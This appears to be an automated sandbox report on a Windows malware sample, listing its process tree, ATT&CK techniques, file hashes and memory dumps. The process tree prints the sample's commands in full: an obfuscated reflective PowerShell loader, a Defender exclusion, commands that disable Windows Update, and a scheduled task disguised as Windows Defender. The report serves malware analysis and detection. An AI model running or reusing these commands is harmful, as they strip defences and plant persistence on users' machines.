- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1532

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
2⤵
PID:844

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
2⤵
PID:796

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
2⤵
PID:732

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
2⤵
PID:652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
2⤵
PID:576

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
3⤵
PID:1480

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:416

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{5c5db92f-4f9e-4ce5-b41b-b870953a6830}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1020

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{c5e7a684-33e1-4a61-953c-e80758a4342e}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1120

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:484

\\?\C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
1⤵
PID:1088

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1420

C:\Users\Admin\AppData\Local\Temp\bibolobun.exe
"C:\Users\Admin\AppData\Local\Temp\bibolobun.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1492

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\bibolobun.exe"
3⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:304

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAGQAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbABhACMAPgAgAEAAKAAgADwAIwBmAGgAegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZwBmAHQAaAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKQAgADwAIwB5AG4AYgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbwAjAD4A"
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1900

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
- Suspicious use of WriteProcessMemory
PID:1376

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:664

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:1120

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:1812

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:1724

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:268

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
5⤵
- Modifies registry key
PID:380

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
5⤵
- Modifies registry key
PID:1228

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
5⤵
- Modifies security service
- Modifies registry key
PID:1488

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
5⤵
- Modifies registry key
PID:1664

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
5⤵
- Modifies registry key
PID:676

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1020

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2032

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:584

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:976

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:940

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:112

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
PID:1480

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:1380

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:2016

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:1096

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:1644

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:268

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:1076

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of WriteProcessMemory
PID:1636

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2044

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1760

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1732

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1064

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "WindowsDefender" /tr "\"C:\Program Files\Platform\Defender\update.exe\""
4⤵
- Suspicious use of WriteProcessMemory
PID:588

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "WindowsDefender" /tr "\"C:\Program Files\Platform\Defender\update.exe\""
5⤵
- Creates scheduled task(s)
PID:1212

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
4⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1552

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "WindowsDefender"
4⤵
PID:1484

C:\Windows\system32\schtasks.exe
schtasks /run /tn "WindowsDefender"
5⤵
PID:1588

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\bibolobun.exe"
4⤵
- Deletes itself
PID:2012

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
5⤵
PID:944

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:1364

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1293759430663324826-1314916948-1229506426-1330068696-766629609-1949643321524327098"
1⤵
PID:1068

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1440040433-1468375976-2492418801346303794-1496375062496222221-2099643894-1359535038"
1⤵
PID:1976

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-33451313610626340221906970602-15599551211303664306589748947427468733139417031"
1⤵
PID:1688

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-550362656-1065221663157404611111213571461811346152769055459822901363-937978055"
1⤵
- Suspicious use of SetWindowsHookEx
PID:1468

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "10986125212024244219-417009599-185023194912080750596047353743617528341599138312"
1⤵
PID:2012

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Platform\Defender\update.exe
Filesize
5.1MB

MD5
2438b851e157a3f70bd48af1984b2139

SHA1
105ce31ecdce604bf8629ddc6580f2ad25fc21b5

SHA256
bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494

SHA512
ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52

Download Submit
C:\Program Files\Platform\Defender\update.exe
Filesize
5.1MB

MD5
2438b851e157a3f70bd48af1984b2139

SHA1
105ce31ecdce604bf8629ddc6580f2ad25fc21b5

SHA256
bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494

SHA512
ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52

Download Submit
C:\Windows\Tasks\dialersvc32.job
Filesize
1KB

MD5
e72e5014f067efec331f4738ec4cb4c9

SHA1
b09fa92454cd39c029ebb7b8dd845dafe60a0946

SHA256
8399bdcdb53cb3892b96cd8b2ff75e871d559db8bf469eb19354a975fa941dd1

SHA512
c58f29e3e3fe6ace74b11cd64c71df6a5a514f7ccd1bcb2efb90d70752fdff1cdcf2d1c86a570e8e7a4f8192acd2dcaba2c9bf3f1d2d54669a646788def14a38

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
3KB

MD5
e546b81f1a1a1b753a4f6d3455394dec

SHA1
14f407db119dd97ed248be2a8d15a09ba938987a

SHA256
1100d55448340b1a23c243209beb3aa1035a45912c346c00afb41181d9798de8

SHA512
03f12755ae8c165323b2562b620731217b9f55affe782e6e07540131065b2edf5c465b5440d6b08c7a1a3d8541e423e8c9919ca768f72f830bc211bceb7fccfe

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Program Files\Platform\Defender\update.exe
Filesize
5.1MB

MD5
2438b851e157a3f70bd48af1984b2139

SHA1
105ce31ecdce604bf8629ddc6580f2ad25fc21b5

SHA256
bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494

SHA512
ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52

Download Submit
\Users\Admin\AppData\Roaming\5FEC.tmp
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Windows\System32\config\systemprofile\AppData\Roaming\C717.tmp
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/112-98-0x0000000000000000-mapping.dmp

Download
memory/268-78-0x0000000000000000-mapping.dmp

Download
memory/268-108-0x0000000000000000-mapping.dmp

Download
memory/276-176-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmp

Filesize
64KB

Download
memory/276-227-0x0000000001D50000-0x0000000001D7A000-memory.dmp

Filesize
168KB

Download
memory/276-228-0x0000000037540000-0x0000000037550000-memory.dmp

Filesize
64KB

Download
memory/300-225-0x0000000000A90000-0x0000000000ABA000-memory.dmp

Filesize
168KB

Download
memory/300-174-0x0000000037540000-0x0000000037550000-memory.dmp

Filesize
64KB

Download
memory/300-172-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmp

Filesize
64KB

Download
memory/304-59-0x000007FEFBD81000-0x000007FEFBD83000-memory.dmp

Filesize
8KB

Download
memory/304-87-0x0000000001FB0000-0x0000000001FBA000-memory.dmp

Filesize
40KB

Download
memory/304-55-0x00000000006D0000-0x00000000006D6000-memory.dmp

Filesize
24KB

Download
memory/304-54-0x000000001BBA0000-0x000000001C072000-memory.dmp

Filesize
4.8MB

Download
memory/304-56-0x00000000000C0000-0x0000000000592000-memory.dmp

Filesize
4.8MB

Download
memory/304-57-0x000000001C070000-0x000000001C524000-memory.dmp

Filesize
4.7MB

Download
memory/304-58-0x00000000006E0000-0x00000000006E6000-memory.dmp

Filesize
24KB

Download
memory/380-79-0x0000000000000000-mapping.dmp

Download
memory/416-127-0x00000000006C0000-0x00000000006E3000-memory.dmp

Filesize
140KB

Download
memory/416-213-0x00000000006C0000-0x00000000006E3000-memory.dmp

Filesize
140KB

Download
memory/416-129-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmp

Filesize
64KB

Download
memory/416-214-0x00000000006F0000-0x000000000071A000-memory.dmp

Filesize
168KB

Download
memory/416-131-0x0000000037540000-0x0000000037550000-memory.dmp

Filesize
64KB

Download
memory/460-134-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmp

Filesize
64KB

Download
memory/460-215-0x00000000000A0000-0x00000000000CA000-memory.dmp

Filesize
168KB

Download
memory/460-137-0x0000000037540000-0x0000000037550000-memory.dmp

Filesize
64KB

Download
memory/476-140-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmp

Filesize
64KB

Download
memory/476-141-0x0000000037540000-0x0000000037550000-memory.dmp

Filesize
64KB

Download
memory/476-216-0x00000000000C0000-0x00000000000EA000-memory.dmp

Filesize
168KB

Download
memory/484-144-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmp

Filesize
64KB

Download
memory/484-146-0x0000000037540000-0x0000000037550000-memory.dmp

Filesize
64KB

Download
memory/484-217-0x00000000004D0000-0x00000000004FA000-memory.dmp

Filesize
168KB

Download
memory/556-364-0x0000000000000000-mapping.dmp

Download
memory/576-149-0x0000000037540000-0x0000000037550000-memory.dmp

Filesize
64KB

Download
memory/576-218-0x0000000000200000-0x000000000022A000-memory.dmp

Filesize
168KB

Download
memory/576-148-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmp

Filesize
64KB

Download
memory/584-95-0x0000000000000000-mapping.dmp

Download
memory/584-341-0x0000000000000000-mapping.dmp

Download
memory/588-72-0x0000000000000000-mapping.dmp

Download
memory/652-152-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmp

Filesize
64KB

Download
memory/652-154-0x0000000037540000-0x0000000037550000-memory.dmp

Filesize
64KB

Download
memory/652-219-0x00000000001E0000-0x000000000020A000-memory.dmp

Filesize
168KB

Download
memory/664-69-0x0000000000000000-mapping.dmp

Download
memory/676-84-0x0000000000000000-mapping.dmp

Download
memory/732-220-0x00000000008C0000-0x00000000008EA000-memory.dmp

Filesize
168KB

Download
memory/732-156-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmp

Filesize
64KB

Download
memory/732-158-0x0000000037540000-0x0000000037550000-memory.dmp

Filesize
64KB

Download
memory/796-221-0x0000000000820000-0x000000000084A000-memory.dmp

Filesize
168KB

Download
memory/796-160-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmp

Filesize
64KB

Download
memory/796-162-0x0000000037540000-0x0000000037550000-memory.dmp

Filesize
64KB

Download
memory/820-305-0x0000000000000000-mapping.dmp

Download
memory/820-308-0x0000000000180000-0x00000000001AA000-memory.dmp

Filesize
168KB

Download
memory/844-223-0x00000000008B0000-0x00000000008DA000-memory.dmp

Filesize
168KB

Download
memory/844-168-0x0000000037540000-0x0000000037550000-memory.dmp

Filesize
64KB

Download
memory/844-167-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmp

Filesize
64KB

Download
memory/872-169-0x0000000037540000-0x0000000037550000-memory.dmp

Filesize
64KB

Download
memory/872-166-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmp

Filesize
64KB

Download
memory/872-222-0x0000000000950000-0x000000000097A000-memory.dmp

Filesize
168KB

Download
memory/892-337-0x0000000000000000-mapping.dmp

Download
memory/940-97-0x0000000000000000-mapping.dmp

Download
memory/944-94-0x0000000000000000-mapping.dmp

Download
memory/976-96-0x0000000000000000-mapping.dmp

Download
memory/1020-125-0x00000000773E0000-0x00000000774FF000-memory.dmp

Filesize
1.1MB

Download
memory/1020-85-0x0000000000000000-mapping.dmp

Download
memory/1020-117-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1020-133-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1020-135-0x0000000077500000-0x00000000776A9000-memory.dmp

Filesize
1.7MB

Download
memory/1020-240-0x0000000000DD0000-0x0000000000DFA000-memory.dmp

Filesize
168KB

Download
memory/1020-120-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1020-118-0x00000001400033F4-mapping.dmp

Download
memory/1020-123-0x0000000077500000-0x00000000776A9000-memory.dmp

Filesize
1.7MB

Download
memory/1032-231-0x0000000037540000-0x0000000037550000-memory.dmp

Filesize
64KB

Download
memory/1032-230-0x00000000008A0000-0x00000000008CA000-memory.dmp

Filesize
168KB

Download
memory/1064-80-0x0000000000000000-mapping.dmp

Download
memory/1068-237-0x00000000006A0000-0x00000000006CA000-memory.dmp

Filesize
168KB

Download
memory/1068-359-0x0000000000000000-mapping.dmp

Download
memory/1068-412-0x0000000000000000-mapping.dmp

Download
memory/1068-262-0x00000000006A0000-0x00000000006CA000-memory.dmp

Filesize
168KB

Download
memory/1076-112-0x0000000000000000-mapping.dmp

Download
memory/1088-239-0x0000000037540000-0x0000000037550000-memory.dmp

Filesize
64KB

Download
memory/1088-238-0x00000000003B0000-0x00000000003DA000-memory.dmp

Filesize
168KB

Download
memory/1096-102-0x0000000000000000-mapping.dmp

Download
memory/1100-397-0x0000000000000000-mapping.dmp

Download
memory/1120-265-0x0000000000C80000-0x0000000000CA1000-memory.dmp

Filesize
132KB

Download
memory/1120-248-0x00000000004039E0-mapping.dmp

Download
memory/1120-71-0x0000000000000000-mapping.dmp

Download
memory/1120-263-0x00000000776E0000-0x0000000077860000-memory.dmp

Filesize
1.5MB

Download
memory/1120-261-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/1212-76-0x0000000000000000-mapping.dmp

Download
memory/1220-105-0x0000000000000000-mapping.dmp

Download
memory/1220-338-0x0000000000000000-mapping.dmp

Download
memory/1228-81-0x0000000000000000-mapping.dmp

Download
memory/1260-229-0x0000000001DF0000-0x0000000001E1A000-memory.dmp

Filesize
168KB

Download
memory/1288-383-0x0000000000000000-mapping.dmp

Download
memory/1288-319-0x0000000000000000-mapping.dmp

Download
memory/1360-328-0x0000000000000000-mapping.dmp

Download
memory/1364-232-0x0000000001B40000-0x0000000001B6A000-memory.dmp

Filesize
168KB

Download
memory/1376-67-0x0000000000000000-mapping.dmp

Download
memory/1380-100-0x0000000000000000-mapping.dmp

Download
memory/1420-236-0x0000000037540000-0x0000000037550000-memory.dmp

Filesize
64KB

Download
memory/1420-234-0x00000000026B0000-0x00000000026DA000-memory.dmp

Filesize
168KB

Download
memory/1468-260-0x0000000003C70000-0x0000000003C91000-memory.dmp

Filesize
132KB

Download
memory/1468-257-0x0000000003C50000-0x0000000003C6B000-memory.dmp

Filesize
108KB

Download
memory/1468-212-0x0000000074130000-0x00000000746DB000-memory.dmp

Filesize
5.7MB

Download
memory/1468-256-0x00000000776E0000-0x0000000077860000-memory.dmp

Filesize
1.5MB

Download
memory/1468-255-0x0000000074130000-0x00000000746DB000-memory.dmp

Filesize
5.7MB

Download
memory/1468-111-0x0000000076121000-0x0000000076123000-memory.dmp

Filesize
8KB

Download
memory/1468-109-0x0000000000000000-mapping.dmp

Download
memory/1480-99-0x0000000000000000-mapping.dmp

Download
memory/1480-469-0x0000000000000000-mapping.dmp

Download
memory/1484-91-0x0000000000000000-mapping.dmp

Download
memory/1488-289-0x0000000000F8B000-0x0000000000FAA000-memory.dmp

Filesize
124KB

Download
memory/1488-283-0x0000000037540000-0x0000000037550000-memory.dmp

Filesize
64KB

Download
memory/1488-82-0x0000000000000000-mapping.dmp

Download
memory/1488-271-0x0000000000000000-mapping.dmp

Download
memory/1488-282-0x0000000000830000-0x000000000085A000-memory.dmp

Filesize
168KB

Download
memory/1488-284-0x0000000000F84000-0x0000000000F87000-memory.dmp

Filesize
12KB

Download
memory/1488-287-0x0000000000B70000-0x0000000000B9A000-memory.dmp

Filesize
168KB

Download
memory/1488-288-0x0000000000F8B000-0x0000000000FAA000-memory.dmp

Filesize
124KB

Download
memory/1512-233-0x00000000002C0000-0x00000000002EA000-memory.dmp

Filesize
168KB

Download
memory/1532-121-0x0000000001234000-0x0000000001237000-memory.dmp

Filesize
12KB

Download
memory/1532-114-0x000007FEF37D0000-0x000007FEF432D000-memory.dmp

Filesize
11.4MB

Download
memory/1532-113-0x000007FEF4330000-0x000007FEF4D53000-memory.dmp

Filesize
10.1MB

Download
memory/1532-116-0x00000000773E0000-0x00000000774FF000-memory.dmp

Filesize
1.1MB

Download
memory/1532-115-0x0000000077500000-0x00000000776A9000-memory.dmp

Filesize
1.7MB

Download
memory/1532-126-0x00000000773E0000-0x00000000774FF000-memory.dmp

Filesize
1.1MB

Download
memory/1532-107-0x0000000000000000-mapping.dmp

Download
memory/1532-122-0x000000000123B000-0x000000000125A000-memory.dmp

Filesize
124KB

Download
memory/1532-124-0x0000000077500000-0x00000000776A9000-memory.dmp

Filesize
1.7MB

Download
memory/1552-89-0x0000000140001844-mapping.dmp

Download
memory/1588-363-0x0000000000000000-mapping.dmp

Download
memory/1588-92-0x0000000000000000-mapping.dmp

Download
memory/1636-68-0x0000000000000000-mapping.dmp

Download
memory/1644-104-0x0000000000000000-mapping.dmp

Download
memory/1664-83-0x0000000000000000-mapping.dmp

Download
memory/1668-294-0x0000000000000000-mapping.dmp

Download
memory/1668-309-0x0000000000510000-0x000000000053A000-memory.dmp

Filesize
168KB

Download
memory/1676-235-0x0000000000180000-0x00000000001AA000-memory.dmp

Filesize
168KB

Download
memory/1688-310-0x00000000001F0000-0x000000000021A000-memory.dmp

Filesize
168KB

Download
memory/1692-368-0x0000000000000000-mapping.dmp

Download
memory/1724-75-0x0000000000000000-mapping.dmp

Download
memory/1732-77-0x0000000000000000-mapping.dmp

Download
memory/1760-74-0x0000000000000000-mapping.dmp

Download
memory/1772-406-0x0000000000000000-mapping.dmp

Download
memory/1804-322-0x0000000000000000-mapping.dmp

Download
memory/1812-73-0x0000000000000000-mapping.dmp

Download
memory/1892-241-0x00000000009E0000-0x0000000000A0A000-memory.dmp

Filesize
168KB

Download
memory/1900-66-0x00000000028EB000-0x000000000290A000-memory.dmp

Filesize
124KB

Download
memory/1900-64-0x00000000028E4000-0x00000000028E7000-memory.dmp

Filesize
12KB

Download
memory/1900-60-0x0000000000000000-mapping.dmp

Download
memory/1900-62-0x000007FEEE290000-0x000007FEEECB3000-memory.dmp

Filesize
10.1MB

Download
memory/1900-258-0x00000000013A0000-0x00000000013CA000-memory.dmp

Filesize
168KB

Download
memory/1900-65-0x00000000028E4000-0x00000000028E7000-memory.dmp

Filesize
12KB

Download
memory/1900-63-0x000007FEED730000-0x000007FEEE28D000-memory.dmp

Filesize
11.4MB

Download
memory/1900-259-0x0000000037540000-0x0000000037550000-memory.dmp

Filesize
64KB

Download
memory/1904-448-0x0000000000000000-mapping.dmp

Download
memory/1928-391-0x0000000000000000-mapping.dmp

Download
memory/1976-285-0x00000000000E0000-0x000000000010A000-memory.dmp

Filesize
168KB

Download
memory/1976-286-0x0000000037540000-0x0000000037550000-memory.dmp

Filesize
64KB

Download
memory/1992-375-0x0000000000000000-mapping.dmp

Download
